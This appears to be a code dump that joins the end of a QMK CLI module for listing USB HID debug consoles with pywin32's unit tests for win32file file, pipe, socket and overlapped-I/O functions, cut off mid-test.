if rp[1] == 0x31 and rp[3] == 0x09:
devices.append(device)
return devices
def find_bootloaders(self):
"""Returns a list of available bootloader devices.
"""
return list(filter(self.is_bootloader, usb.core.find(find_all=True)))
def find_devices(self):
"""Returns a list of available teensy-style consoles.
"""
hid_devices = hid.enumerate()
devices = list(filter(self.is_console_hid, hid_devices))
if not devices:
devices = self.find_devices_by_report(hid_devices)
if self.vid and self.pid:
devices = list(filter(self.is_filtered_device, devices))
# Add index numbers
device_index = {}
for device in devices:
id = ':'.join((int2hex(device['vendor_id']), int2hex(device['product_id'])))
if id not in device_index:
device_index[id] = 0
device_index[id] += 1
device['index'] = device_index[id]
return devices
def int2hex(number):
"""Returns a string representation of the number as hex.
"""
return "%04X" % number
def list_devices(device_finder):
"""Show the user a nicely formatted list of devices.
"""
devices = device_finder.find_devices()
if devices:
cli.log.info('Available devices:')
for dev in devices:
color = LOG_COLOR['colors'][LOG_COLOR['next']]
LOG_COLOR['next'] = (LOG_COLOR['next'] + 1) % len(LOG_COLOR['colors'])
cli.log.info("\t%s%s:%s:%d{style_reset_all}\t%s %s", color, int2hex(dev['vendor_id']), int2hex(dev['product_id']), dev['index'], dev['manufacturer_string'], dev['product_string'])
if cli.args.bootloaders:
bootloaders = device_finder.find_bootloaders()
if bootloaders:
cli.log.info('Available Bootloaders:')
for dev in bootloaders:
cli.log.info("\t%s:%s\t%s", int2hex(dev.idVendor), int2hex(dev.idProduct), KNOWN_BOOTLOADERS[(int2hex(dev.idVendor), int2hex(dev.idProduct))])
@cli.argument('--bootloaders', arg_only=True, default=True, action='store_boolean', help='displaying bootloaders.')
@cli.argument('-d', '--device', help='Device to select - uses format <pid>:<vid>[:<index>].')
@cli.argument('-l', '--list', arg_only=True, action='store_true', help='List available hid_listen devices.')
@cli.argument('-n', '--numeric', arg_only=True, action='store_true', help='Show VID/PID instead of names.')
@cli.argument('-t', '--timestamp', arg_only=True, action='store_true', help='Print the timestamp for received messages as well.')
@cli.argument('-w', '--wait', type=int, default=1, help="How many seconds to wait between checks (Default: 1)")
@cli.subcommand('Acquire debugging information from usb hid devices.', hidden=False if cli.config.user.developer else True)
def console(cli):
"""Acquire debugging information from usb hid devices
"""
vid = None
pid = None
index = 1
if cli.config.console.device:
device = cli.config.console.device.split(':')
if len(device) == 2:
vid, pid = device
elif len(device) == 3:
vid, pid, index = device
if not index.isdigit():
cli.log.error('Device index must be a number! Got "%s" instead.', index)
exit(1)
index = int(index)
if index < 1:
cli.log.error('Device index must be greater than 0! Got %s', index)
exit(1)
else:
cli.log.error('Invalid format for device, expected "<pid>:<vid>[:<index>]" but got "%s".', cli.config.console.device)
cli.print_help()
exit(1)
vid = vid.upper()
pid = pid.upper()
device_finder = FindDevices(vid, pid, index, cli.args.numeric)
if cli.args.list:
return list_devices(device_finder)
print('Looking for devices...', flush=True)
device_finder.run_forever()
|
test_win32file.py
|
from __future__ import print_function
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now_utc = win32timezone.utcnow().replace(microsecond=0)
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now = datetime.datetime.now(tz=TimeZoneInfo.utc()).replace(microsecond=0)
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to check.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later, UTCTimes=True)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestGetFileInfoByHandleEx(unittest.TestCase):
__handle = __filename = None
def setUp(self):
fd, self.__filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
if self.__handle is not None:
self.__handle.Close()
if self.__filename is not None:
try:
os.unlink(self.__filename)
except OSError:
pass
self.__handle = self.__filename = None
def testFileBasicInfo(self):
attr = win32file.GetFileAttributes(self.__filename)
f = win32file.CreateFile(self.__filename, win32file.GENERIC_READ, 0, None,
win32con.OPEN_EXISTING, 0, None)
self.__handle = f
ct, at, wt = win32file.GetFileTime(f)
# bug #752: this throws ERROR_BAD_LENGTH (24) in x86 binaries of build 221
basic_info = win32file.GetFileInformationByHandleEx(f, win32file.FileBasicInfo)
self.assertEqual(ct, basic_info['CreationTime'])
self.assertEqual(at, basic_info['LastAccessTime'])
self.assertEqual(wt, basic_info['LastWriteTime'])
self.assertEqual(attr, basic_info['FileAttributes'])
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error as details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print("waiting", dh)
changes = win32file.ReadDirectoryChangesW(dh,
8192,
False, #sub-tree
flags)
print("got", changes)
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print("ERROR: Watcher thread timed-out!")
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print("FAILED to remove directory", dn)
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print("FAILED to wait for thread termination")
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error as details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print("It appears this is not NTFS - cant encrypt/decrypt")
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024*1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error as e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error as e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
